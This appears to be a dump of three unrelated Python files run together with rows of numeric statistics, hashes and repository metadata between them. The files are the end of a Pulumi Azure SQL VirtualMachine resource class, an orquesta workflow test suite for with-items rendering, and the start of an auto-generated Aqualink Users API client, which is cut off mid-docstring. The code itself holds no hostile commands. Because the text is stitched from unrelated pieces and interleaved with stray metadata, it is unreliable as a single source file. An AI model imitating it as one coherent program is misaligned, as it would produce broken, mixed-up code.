sql_connectivity_type: Optional[pulumi.Input[str]] = None,
sql_connectivity_update_password: Optional[pulumi.Input[str]] = None,
sql_connectivity_update_username: Optional[pulumi.Input[str]] = None,
sql_license_type: Optional[pulumi.Input[str]] = None,
storage_configuration: Optional[pulumi.Input[pulumi.InputType['VirtualMachineStorageConfigurationArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machine_id: Optional[pulumi.Input[str]] = None) -> 'VirtualMachine':
"""
Get an existing VirtualMachine resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['VirtualMachineAutoBackupArgs']] auto_backup: An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['VirtualMachineAutoPatchingArgs']] auto_patching: An `auto_patching` block as defined below.
:param pulumi.Input[pulumi.InputType['VirtualMachineKeyVaultCredentialArgs']] key_vault_credential: (Optional) An `key_vault_credential` block as defined below.
:param pulumi.Input[bool] r_services_enabled: Should R Services be enabled?
:param pulumi.Input[int] sql_connectivity_port: The SQL Server port. Defaults to `1433`.
:param pulumi.Input[str] sql_connectivity_type: The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
:param pulumi.Input[str] sql_connectivity_update_password: The SQL Server sysadmin login password.
:param pulumi.Input[str] sql_connectivity_update_username: The SQL Server sysadmin login to create.
:param pulumi.Input[str] sql_license_type: The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['VirtualMachineStorageConfigurationArgs']] storage_configuration: An `storage_configuration` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VirtualMachineState.__new__(_VirtualMachineState)
__props__.__dict__["auto_backup"] = auto_backup
__props__.__dict__["auto_patching"] = auto_patching
__props__.__dict__["key_vault_credential"] = key_vault_credential
__props__.__dict__["r_services_enabled"] = r_services_enabled
__props__.__dict__["sql_connectivity_port"] = sql_connectivity_port
__props__.__dict__["sql_connectivity_type"] = sql_connectivity_type
__props__.__dict__["sql_connectivity_update_password"] = sql_connectivity_update_password
__props__.__dict__["sql_connectivity_update_username"] = sql_connectivity_update_username
__props__.__dict__["sql_license_type"] = sql_license_type
__props__.__dict__["storage_configuration"] = storage_configuration
__props__.__dict__["tags"] = tags
__props__.__dict__["virtual_machine_id"] = virtual_machine_id
return VirtualMachine(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="autoBackup")
def auto_backup(self) -> pulumi.Output[Optional['outputs.VirtualMachineAutoBackup']]:
"""
An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
"""
return pulumi.get(self, "auto_backup")
@property
@pulumi.getter(name="autoPatching")
def auto_patching(self) -> pulumi.Output[Optional['outputs.VirtualMachineAutoPatching']]:
"""
An `auto_patching` block as defined below.
"""
return pulumi.get(self, "auto_patching")
@property
@pulumi.getter(name="keyVaultCredential")
def key_vault_credential(self) -> pulumi.Output[Optional['outputs.VirtualMachineKeyVaultCredential']]:
"""
(Optional) An `key_vault_credential` block as defined below.
"""
return pulumi.get(self, "key_vault_credential")
@property
@pulumi.getter(name="rServicesEnabled")
def r_services_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Should R Services be enabled?
"""
return pulumi.get(self, "r_services_enabled")
@property
@pulumi.getter(name="sqlConnectivityPort")
def sql_connectivity_port(self) -> pulumi.Output[Optional[int]]:
"""
The SQL Server port. Defaults to `1433`.
"""
return pulumi.get(self, "sql_connectivity_port")
@property
@pulumi.getter(name="sqlConnectivityType")
def sql_connectivity_type(self) -> pulumi.Output[Optional[str]]:
"""
The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
"""
return pulumi.get(self, "sql_connectivity_type")
@property
@pulumi.getter(name="sqlConnectivityUpdatePassword")
def sql_connectivity_update_password(self) -> pulumi.Output[Optional[str]]:
"""
The SQL Server sysadmin login password.
"""
return pulumi.get(self, "sql_connectivity_update_password")
@property
@pulumi.getter(name="sqlConnectivityUpdateUsername")
def sql_connectivity_update_username(self) -> pulumi.Output[Optional[str]]:
"""
The SQL Server sysadmin login to create.
"""
return pulumi.get(self, "sql_connectivity_update_username")
@property
@pulumi.getter(name="sqlLicenseType")
def sql_license_type(self) -> pulumi.Output[str]:
"""
The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "sql_license_type")
@property
@pulumi.getter(name="storageConfiguration")
def storage_configuration(self) -> pulumi.Output[Optional['outputs.VirtualMachineStorageConfiguration']]:
"""
An `storage_configuration` block as defined below.
"""
return pulumi.get(self, "storage_configuration")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="virtualMachineId")
def virtual_machine_id(self) -> pulumi.Output[str]:
"""
The ID of the Virtual Machine. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_machine_id")
| 51.718367
| 241
| 0.693868
| 4,300
| 38,013
| 5.853953
| 0.055814
| 0.0756
| 0.07699
| 0.034085
| 0.925195
| 0.914031
| 0.910218
| 0.90557
| 0.89969
| 0.885508
| 0
| 0.003965
| 0.210402
| 38,013
| 734
| 242
| 51.788828
| 0.834683
| 0.317076
| 0
| 0.823961
| 1
| 0
| 0.178907
| 0.111594
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163814
| false
| 0.066015
| 0.017115
| 0
| 0.278729
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
44ae14ad870b56f5ea786483b48850918bc37b46
| 12,811
|
py
|
Python
|
orquesta/tests/unit/conducting/native/test_task_rendering_for_with_items.py
|
trstruth/orquesta
|
e6ebbbeb2c661486067e659dc7552f0a986603a6
|
[
"Apache-2.0"
] | 3
|
2020-11-17T21:29:26.000Z
|
2021-03-17T13:56:16.000Z
|
orquesta/tests/unit/conducting/native/test_task_rendering_for_with_items.py
|
trstruth/orquesta
|
e6ebbbeb2c661486067e659dc7552f0a986603a6
|
[
"Apache-2.0"
] | 5
|
2021-03-02T01:41:36.000Z
|
2022-03-08T23:31:31.000Z
|
orquesta/tests/unit/conducting/native/test_task_rendering_for_with_items.py
|
trstruth/orquesta
|
e6ebbbeb2c661486067e659dc7552f0a986603a6
|
[
"Apache-2.0"
] | 15
|
2020-08-08T16:21:40.000Z
|
2022-03-17T04:45:51.000Z
|
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orquesta import conducting
from orquesta.specs import native as native_specs
from orquesta import statuses
from orquesta.tests.unit import base as test_base
class WorkflowConductorWithItemsTaskRenderingTest(test_base.WorkflowConductorTest):
def test_bad_item_key(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: x in <% ctx(xs) %>
action: core.echo message=<% item(y) %>
"""
expected_errors = [
{
'type': 'error',
'message': (
'YaqlEvaluationException: Unable to evaluate expression \'<% item(y) %>\'. '
'ExpressionEvaluationException: Item does not have key "y".'
),
'task_id': 'task1',
'route': 0
}
]
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
tasks = conductor.get_next_tasks()
self.assertListEqual(tasks, [])
self.assertEqual(conductor.get_workflow_status(), statuses.FAILED)
self.assertListEqual(conductor.errors, expected_errors)
def test_bad_item_type(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item(x) %>
"""
expected_errors = [
{
'type': 'error',
'message': (
'YaqlEvaluationException: Unable to evaluate expression \'<% item(x) %>\'. '
'ExpressionEvaluationException: Item is not type of dict.'
),
'task_id': 'task1',
'route': 0
}
]
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
tasks = conductor.get_next_tasks()
self.assertListEqual(tasks, [])
self.assertEqual(conductor.get_workflow_status(), statuses.FAILED)
self.assertListEqual(conductor.errors, expected_errors)
def test_bad_items_type(self):
wf_def = """
version: 1.0
vars:
- xs: fee fi fo fum
tasks:
task1:
with: x in <% ctx(xs) %>
action: core.echo message=<% item(y) %>
"""
expected_errors = [
{
'type': 'error',
'message': 'TypeError: The value of "<% ctx(xs) %>" is not type of list.',
'task_id': 'task1',
'route': 0
}
]
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
tasks = conductor.get_next_tasks()
self.assertListEqual(tasks, [])
self.assertEqual(conductor.get_workflow_status(), statuses.FAILED)
self.assertListEqual(conductor.errors, expected_errors)
def test_start_task_rendering(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: x in <% ctx(xs) %>
action: core.echo message=<% item(x) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
task_route = 0
next_task_name = 'task1'
next_task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
next_task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
expected_task = self.format_task_item(
next_task_name,
task_route,
next_task_ctx,
next_task_spec,
actions=next_task_action_specs,
items_count=len(next_task_ctx['xs']),
items_concurrency=None
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
def test_next_task_rendering(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
action: core.noop
next:
- do: task2
task2:
with: x in <% ctx(xs) %>
action: core.echo message=<% item(x) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
# Process start task.
task_route = 0
next_task_name = 'task1'
next_task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
next_task_action_specs = [
{'action': 'core.noop', 'input': None}
]
expected_task = self.format_task_item(
next_task_name,
task_route,
next_task_ctx,
next_task_spec,
actions=next_task_action_specs
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
status_changes = [statuses.RUNNING, statuses.SUCCEEDED]
self.forward_task_statuses(conductor, next_task_name, status_changes)
# Process next task.
next_task_name = 'task2'
next_task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
next_task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
expected_task = self.format_task_item(
next_task_name,
task_route,
next_task_ctx,
next_task_spec,
actions=next_task_action_specs,
items_count=len(next_task_ctx['xs']),
items_concurrency=None
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
def test_basic_list_rendering(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
task_route = 0
next_task_name = 'task1'
next_task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
next_task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
expected_task = self.format_task_item(
next_task_name,
task_route,
next_task_ctx,
next_task_spec,
actions=next_task_action_specs,
items_count=len(next_task_ctx['xs']),
items_concurrency=None
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
def test_basic_list_rendering_var_w_in(self):
wf_def = """
version: 1.0
vars:
- domains:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(domains) %>
action: core.echo message=<% item() %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
task_route = 0
next_task_name = 'task1'
next_task_ctx = {'domains': ['fee', 'fi', 'fo', 'fum']}
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
next_task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
expected_task = self.format_task_item(
next_task_name,
task_route,
next_task_ctx,
next_task_spec,
actions=next_task_action_specs,
items_count=len(next_task_ctx['domains']),
items_concurrency=None
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
def test_multiple_lists_rendering(self):
wf_def = """
version: 1.0
vars:
- xs:
- foo
- fu
- marco
- ys:
- bar
- bar
- polo
tasks:
task1:
with: x, y in <% zip(ctx(xs), ctx(ys)) %>
action: core.echo message=<% item(x) + item(y) %>
"""
spec = native_specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_status(statuses.RUNNING)
task_route = 0
next_task_name = 'task1'
next_task_ctx = {'xs': ['foo', 'fu', 'marco'], 'ys': ['bar', 'bar', 'polo']}
next_task_spec = conductor.spec.tasks.get_task(next_task_name)
next_task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'foobar'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fubar'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'marcopolo'}, 'item_id': 2},
]
expected_task = self.format_task_item(
next_task_name,
task_route,
next_task_ctx,
next_task_spec,
actions=next_task_action_specs,
items_count=len(next_task_ctx['xs']),
items_concurrency=None
)
expected_tasks = [expected_task]
actual_tasks = conductor.get_next_tasks()
self.assert_task_list(conductor, actual_tasks, expected_tasks)
| 31.170316
| 96
| 0.543673
| 1,341
| 12,811
| 4.936614
| 0.126771
| 0.074924
| 0.0571
| 0.054532
| 0.830514
| 0.828399
| 0.824471
| 0.821148
| 0.800302
| 0.795317
| 0
| 0.008191
| 0.332917
| 12,811
| 410
| 97
| 31.246341
| 0.76644
| 0.046679
| 0
| 0.800623
| 0
| 0
| 0.282365
| 0.008855
| 0
| 0
| 0
| 0
| 0.071651
| 1
| 0.024922
| false
| 0
| 0.012461
| 0
| 0.040498
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44e000959d86c618f9d201401ca8fa4bdcd9d5ef
| 24,062
|
py
|
Python
|
sdk/aqualink_sdk/api/users_api.py
|
aqualinkorg/aqualink-sdk
|
dad972d1dd5b74e8216bdc30521a8b76f7844733
|
[
"MIT"
] | 1
|
2022-02-06T23:05:37.000Z
|
2022-02-06T23:05:37.000Z
|
sdk/aqualink_sdk/api/users_api.py
|
aqualinkorg/aqualink-sdk
|
dad972d1dd5b74e8216bdc30521a8b76f7844733
|
[
"MIT"
] | 3
|
2022-02-07T06:13:31.000Z
|
2022-03-11T12:43:39.000Z
|
sdk/aqualink_sdk/api/users_api.py
|
aqualinkorg/aqualink-sdk
|
dad972d1dd5b74e8216bdc30521a8b76f7844733
|
[
"MIT"
] | null | null | null |
"""
Aqualink API documentation
The Aqualink public API documentation # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from aqualink_sdk.api_client import ApiClient, Endpoint as _Endpoint
from aqualink_sdk.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from aqualink_sdk.model.create_user_dto import CreateUserDto
from aqualink_sdk.model.inline_response404 import InlineResponse404
from aqualink_sdk.model.set_admin_level_dto import SetAdminLevelDto
from aqualink_sdk.model.site import Site
from aqualink_sdk.model.user import User
class UsersApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.users_controller_create_endpoint = _Endpoint(
settings={
'response_type': (User,),
'auth': [],
'endpoint_path': '/users',
'operation_id': 'users_controller_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'create_user_dto',
],
'required': [
'create_user_dto',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'create_user_dto':
(CreateUserDto,),
},
'attribute_map': {
},
'location_map': {
'create_user_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.users_controller_delete_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'bearer'
],
'endpoint_path': '/users/{id}',
'operation_id': 'users_controller_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(float,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.users_controller_get_administered_sites_endpoint = _Endpoint(
settings={
'response_type': ([Site],),
'auth': [
'bearer'
],
'endpoint_path': '/users/current/administered-sites',
'operation_id': 'users_controller_get_administered_sites',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.users_controller_get_self_endpoint = _Endpoint(
settings={
'response_type': (User,),
'auth': [
'bearer'
],
'endpoint_path': '/users/current',
'operation_id': 'users_controller_get_self',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.users_controller_set_admin_level_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'bearer'
],
'endpoint_path': '/users/{id}/level',
'operation_id': 'users_controller_set_admin_level',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'id',
'set_admin_level_dto',
],
'required': [
'id',
'set_admin_level_dto',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(float,),
'set_admin_level_dto':
(SetAdminLevelDto,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'set_admin_level_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
def users_controller_create(
self,
create_user_dto,
**kwargs
):
"""Creates a new user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_controller_create(create_user_dto, async_req=True)
>>> result = thread.get()
Args:
create_user_dto (CreateUserDto):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
User
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['create_user_dto'] = \
create_user_dto
return self.users_controller_create_endpoint.call_with_http_info(**kwargs)
def users_controller_delete(
self,
id,
**kwargs
):
"""Deletes specified user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_controller_delete(id, async_req=True)
>>> result = thread.get()
Args:
id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.users_controller_delete_endpoint.call_with_http_info(**kwargs)
def users_controller_get_administered_sites(
self,
**kwargs
):
"""Returns the administered sites of the signed in user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_controller_get_administered_sites(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Site]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
return self.users_controller_get_administered_sites_endpoint.call_with_http_info(**kwargs)
def users_controller_get_self(
self,
**kwargs
):
"""Returns the currently signed in user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_controller_get_self(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
User
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
return self.users_controller_get_self_endpoint.call_with_http_info(**kwargs)
def users_controller_set_admin_level(
self,
id,
set_admin_level_dto,
**kwargs
):
"""Updates the access level of a user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_controller_set_admin_level(id, set_admin_level_dto, async_req=True)
>>> result = thread.get()
Args:
id (float):
set_admin_level_dto (SetAdminLevelDto):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
